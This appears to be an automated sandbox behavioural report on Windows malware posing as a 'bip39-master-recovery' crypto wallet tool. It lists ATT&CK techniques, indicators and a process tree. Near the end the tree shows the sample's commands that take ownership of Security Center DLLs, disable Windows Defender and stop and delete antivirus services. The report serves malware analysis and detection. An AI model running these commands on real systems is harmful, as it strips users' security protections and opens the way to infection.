Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	getapcc-v+.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	get.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	get.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bip39-master-recover.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bip39-master-recovery®.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	getc.o.s.r.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sshclients.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 11 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	Process
5164	PING.EXE
3564	PING.EXE
5180	PING.EXE
5536	PING.EXE
5836	PING.EXE
2332	PING.EXE
5872	PING.EXE
1324	PING.EXE
5184	PING.EXE
4704	PING.EXE
5580	PING.EXE

Delays execution with timeout.exe 8 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	Process
6108	timeout.exe
6092	timeout.exe
5816	timeout.exe
5816	timeout.exe
5520	timeout.exe
368	timeout.exe
6124	timeout.exe
5472	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers system information 1 TTPs 3 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

Processes:

systeminfo.exesysteminfo.exesysteminfo.exe

pid	Process
412	systeminfo.exe
3164	systeminfo.exe
3492	systeminfo.exe

Kills process with taskkill 3 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid	Process
2960	taskkill.exe
4976	taskkill.exe
5128	taskkill.exe

Modifies registry class 2 IoCs

Processes:

bip39-master-recover.exesecuresatudua-x64.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	bip39-master-recover.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	securesatudua-x64.exe

Runs ping.exe 1 TTPs 11 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	Process
5164	PING.EXE
1324	PING.EXE
3564	PING.EXE
5536	PING.EXE
4704	PING.EXE
5580	PING.EXE
2332	PING.EXE
5180	PING.EXE
5184	PING.EXE
5836	PING.EXE
5872	PING.EXE

Suspicious behavior: EnumeratesProcesses 40 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exemsedge.exe

pid	Process
1000	msedge.exe
1000	msedge.exe
3056	msedge.exe
3056	msedge.exe
4832	identity_helper.exe
4832	identity_helper.exe
5624	powershell.exe
5624	powershell.exe
5624	powershell.exe
5756	powershell.exe
5756	powershell.exe
5756	powershell.exe
5948	powershell.exe
5948	powershell.exe
5948	powershell.exe
6088	powershell.exe
6088	powershell.exe
6088	powershell.exe
5184	powershell.exe
5184	powershell.exe
5184	powershell.exe
5292	powershell.exe
5292	powershell.exe
5292	powershell.exe
5616	powershell.exe
5616	powershell.exe
5616	powershell.exe
5656	powershell.exe
5656	powershell.exe
5656	powershell.exe
5764	powershell.exe
5764	powershell.exe
5764	powershell.exe
1900	powershell.exe
1900	powershell.exe
1900	powershell.exe
5600	msedge.exe
5600	msedge.exe
5600	msedge.exe
5600	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

Processes:

msedge.exe

pid	Process
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

Processes:

takeown.exetakeown.exetakeown.exetaskkill.exetaskkill.exetaskkill.exemsiexec.exemsiexec.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	Process
Token: SeTakeOwnershipPrivilege	2608	takeown.exe
Token: SeTakeOwnershipPrivilege	1900	takeown.exe
Token: SeTakeOwnershipPrivilege	2944	takeown.exe
Token: SeDebugPrivilege	2960	taskkill.exe
Token: SeDebugPrivilege	4976	taskkill.exe
Token: SeDebugPrivilege	5128	taskkill.exe
Token: SeShutdownPrivilege	5264	msiexec.exe
Token: SeIncreaseQuotaPrivilege	5264	msiexec.exe
Token: SeSecurityPrivilege	5300	msiexec.exe
Token: SeCreateTokenPrivilege	5264	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	5264	msiexec.exe
Token: SeLockMemoryPrivilege	5264	msiexec.exe
Token: SeIncreaseQuotaPrivilege	5264	msiexec.exe
Token: SeMachineAccountPrivilege	5264	msiexec.exe
Token: SeTcbPrivilege	5264	msiexec.exe
Token: SeSecurityPrivilege	5264	msiexec.exe
Token: SeTakeOwnershipPrivilege	5264	msiexec.exe
Token: SeLoadDriverPrivilege	5264	msiexec.exe
Token: SeSystemProfilePrivilege	5264	msiexec.exe
Token: SeSystemtimePrivilege	5264	msiexec.exe
Token: SeProfSingleProcessPrivilege	5264	msiexec.exe
Token: SeIncBasePriorityPrivilege	5264	msiexec.exe
Token: SeCreatePagefilePrivilege	5264	msiexec.exe
Token: SeCreatePermanentPrivilege	5264	msiexec.exe
Token: SeBackupPrivilege	5264	msiexec.exe
Token: SeRestorePrivilege	5264	msiexec.exe
Token: SeShutdownPrivilege	5264	msiexec.exe
Token: SeDebugPrivilege	5264	msiexec.exe
Token: SeAuditPrivilege	5264	msiexec.exe
Token: SeSystemEnvironmentPrivilege	5264	msiexec.exe
Token: SeChangeNotifyPrivilege	5264	msiexec.exe
Token: SeRemoteShutdownPrivilege	5264	msiexec.exe
Token: SeUndockPrivilege	5264	msiexec.exe
Token: SeSyncAgentPrivilege	5264	msiexec.exe
Token: SeEnableDelegationPrivilege	5264	msiexec.exe
Token: SeManageVolumePrivilege	5264	msiexec.exe
Token: SeImpersonatePrivilege	5264	msiexec.exe
Token: SeCreateGlobalPrivilege	5264	msiexec.exe
Token: SeDebugPrivilege	5624	powershell.exe
Token: SeDebugPrivilege	5756	powershell.exe
Token: SeDebugPrivilege	5948	powershell.exe
Token: SeDebugPrivilege	6088	powershell.exe
Token: SeDebugPrivilege	5184	powershell.exe
Token: SeDebugPrivilege	5292	powershell.exe
Token: SeDebugPrivilege	5616	powershell.exe
Token: SeDebugPrivilege	5656	powershell.exe
Token: SeDebugPrivilege	5764	powershell.exe
Token: SeDebugPrivilege	1900	powershell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

Processes:

msedge.exe

pid	Process
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	Process
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe
3056	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exebip39-master-recovery®.execmd.exec.o.s.r-v9'.exesys-version27'.exebip39-master-recover.exemsedge.exe

description	pid	Process	procid_target
PID 1648 wrote to memory of 1020	1648	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe	84
PID 1648 wrote to memory of 1020	1648	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe	84
PID 1648 wrote to memory of 1020	1648	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe	84
PID 1020 wrote to memory of 2692	1020	bip39-master-recovery®.exe	85
PID 1020 wrote to memory of 2692	1020	bip39-master-recovery®.exe	85
PID 1020 wrote to memory of 2692	1020	bip39-master-recovery®.exe	85
PID 2692 wrote to memory of 2032	2692	cmd.exe	88
PID 2692 wrote to memory of 2032	2692	cmd.exe	88
PID 2692 wrote to memory of 2032	2692	cmd.exe	88
PID 2032 wrote to memory of 2260	2032	c.o.s.r-v9'.exe	89
PID 2032 wrote to memory of 2260	2032	c.o.s.r-v9'.exe	89
PID 2032 wrote to memory of 2260	2032	c.o.s.r-v9'.exe	89
PID 2692 wrote to memory of 816	2692	cmd.exe	90
PID 2692 wrote to memory of 816	2692	cmd.exe	90
PID 2692 wrote to memory of 816	2692	cmd.exe	90
PID 2260 wrote to memory of 5104	2260	sys-version27'.exe	91
PID 2260 wrote to memory of 5104	2260	sys-version27'.exe	91
PID 2260 wrote to memory of 5104	2260	sys-version27'.exe	91
PID 816 wrote to memory of 3056	816	bip39-master-recover.exe	94
PID 816 wrote to memory of 3056	816	bip39-master-recover.exe	94
PID 3056 wrote to memory of 5016	3056	msedge.exe	95
PID 3056 wrote to memory of 5016	3056	msedge.exe	95
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 4624	3056	msedge.exe	97
PID 3056 wrote to memory of 1000	3056	msedge.exe	98
PID 3056 wrote to memory of 1000	3056	msedge.exe	98

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	Process
5476	attrib.exe
6080	attrib.exe
6084	attrib.exe
1608	attrib.exe
1832	attrib.exe
3080	attrib.exe

C:\Users\Admin\AppData\Local\Temp\3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
"C:\Users\Admin\AppData\Local\Temp\3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe"
1⤵
- Checks computer location settings
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1648
- C:\Windows\SysWOW64\java\bip39-master-recovery®.exe
  "C:\Windows\SysWOW64\java\bip39-master-recovery®.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8702.tmp\bip39-master-recover®c.o.s.r-v21'.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2692
  - - C:\Windows\SysWOW64\java\c.o.s.r-v9'.exe
      c.o.s.r-v9'.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious use of WriteProcessMemory
      PID:2032
    - - C:\Windows\SysWOW64\xml\sys-version27'.exe
        
        "C:\Windows\SysWOW64\xml\sys-version27'.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2260
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\89B2.tmp\av.bat" "
        6⤵
        
        PID:5104
  - - C:\Windows\SysWOW64\java\bip39-master-recover.exe
      bip39-master-recover.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:816
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\bip39-master\bip39-standalone.html
        5⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:3056
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0xd8,0xdc,0x10c,0xe0,0x7ffcc75d46f8,0x7ffcc75d4708,0x7ffcc75d4718
        6⤵
        
        PID:5016
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,13299906126854150886,430918807314787680,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2032 /prefetch:2
        6⤵
        
        PID:4624
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,13299906126854150886,430918807314787680,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2480 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1000
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2020,13299906126854150886,430918807314787680,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8
        6⤵
        
        PID:712
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,13299906126854150886,430918807314787680,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
        6⤵
        
        PID:1984
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,13299906126854150886,430918807314787680,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
        6⤵
        
        PID:4836
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,13299906126854150886,430918807314787680,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4708 /prefetch:8
        6⤵
        
        PID:2784
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,13299906126854150886,430918807314787680,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4708 /prefetch:8
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4832
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,13299906126854150886,430918807314787680,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1
        6⤵
        
        PID:376
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,13299906126854150886,430918807314787680,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:1
        6⤵
        
        PID:2740
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,13299906126854150886,430918807314787680,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4128 /prefetch:1
        6⤵
        
        PID:5344
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,13299906126854150886,430918807314787680,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1
        6⤵
        
        PID:5352
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,13299906126854150886,430918807314787680,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5492 /prefetch:2
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5600
  - - C:\Windows\SysWOW64\xml\sys-v17'.exe
      "C:\Windows\SysWOW64\xml\sys-v17'.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in System32 directory
      PID:1688
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9616.tmp\sys-c.o.s.r(debknci').bat" "
        5⤵
        
        PID:3400
      - C:\Windows\SysWOW64\java\github.exe
        
        github.exe 1 sys-c.o.s.r-terkunci.exe sys-networks'.exe @sys.v10@a2
        6⤵
        Executes dropped EXE
        
        PID:4980
      - C:\Windows\SysWOW64\java\sys-networks'.exe
        
        sys-networks'.exe
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:2812
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9848.tmp\x86x64(c.o.s.r).bat" "
        7⤵
        
        PID:1712
        
        C:\Windows\SysWOW64\systeminfo.exe
        
        systeminfo.exe
        8⤵
        Gathers system information
        
        PID:3492
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /B /C:"OS Name" /C:"System Type" /C:"Host Name"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1900
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\sysinfo-c.o.s.r-v9.txt" "
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1792
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "x64-based"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1228
        
        C:\Windows\SysWOW64\java\securesatudua-x64.exe
        
        securesatudua-x64.exe
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in System32 directory
        Modifies registry class
        
        PID:1980
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Windows\System32\securesatudua.bat"
        9⤵
        
        PID:2528
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\wscapi.dll
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:2608
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\wscapi.dll /grant administrators:F
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4976
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\wscsvc.dll
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:1900
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\wscsvc.dll /grant administrators:F
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2436
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\wscui.cpl
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:2944
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\wscui.dll /grant administrators:F
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4440
        
        C:\Windows\system32\sc.exe
        
        sc.exe config WinDefend start= disabled
        10⤵
        Launches sc.exe
        
        PID:3244
        
        C:\Windows\system32\sc.exe
        
        sc stop "avast! Antivirus"
        10⤵
        Launches sc.exe
        
        PID:2960
        
        C:\Windows\system32\sc.exe
        
        sc delete "avast! Antivirus"
        10⤵
        Launches sc.exe
        
        PID:1900
        
        C:\Windows\system32\sc.exe
        
        sc stop "NanoServiceMain"
        10⤵
        Launches sc.exe
        
        PID:4976
        
        C:\Windows\system32\sc.exe
        
        sc delete "NanoServiceMain"
        10⤵
        Launches sc.exe
        
        PID:4304
        
        C:\Windows\system32\sc.exe
        
        sc stop newserv
        10⤵
        Launches sc.exe
        
        PID:3492
        
        C:\Windows\system32\sc.exe
        
        sc delete newserv
        10⤵
        Launches sc.exe
        
        PID:4440
        
        C:\Windows\system32\sc.exe
        
        sc stop UxSms
        10⤵
        Launches sc.exe
        
        PID:4964
        
